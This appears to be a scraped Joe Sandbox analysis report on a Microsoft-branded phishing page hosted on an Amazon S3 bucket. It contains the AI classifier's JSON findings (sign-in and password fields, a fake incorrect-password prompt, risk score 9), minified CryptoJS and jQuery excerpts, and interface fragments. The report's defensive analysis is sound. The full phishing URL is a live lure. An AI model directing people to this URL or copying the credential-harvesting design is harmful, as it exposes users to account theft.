e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The URL 'empressachkaortshe.s3.ap-northeast-2.amazonaws.com' does not match the legitimate domain 'microsoft.com'.", "The URL is hosted on an Amazon S3 bucket, which is a common tactic used in phishing to host malicious content.", "The domain does not contain any direct reference to 'Microsoft', which is suspicious.", "The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts." ], "riskscore": 9}
Google indexed: False |
URL: empressachkaortshe.s3.ap-northeast-2.amazonaws.com
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. The code does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. It primarily consists of utility functions and object manipulations typical of a library. There are no interactions with external domains or obfuscated code present. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Your account or password is incorrect. If you can't re member your password, reset it now.",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
chrome.exe (PID: 6984 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node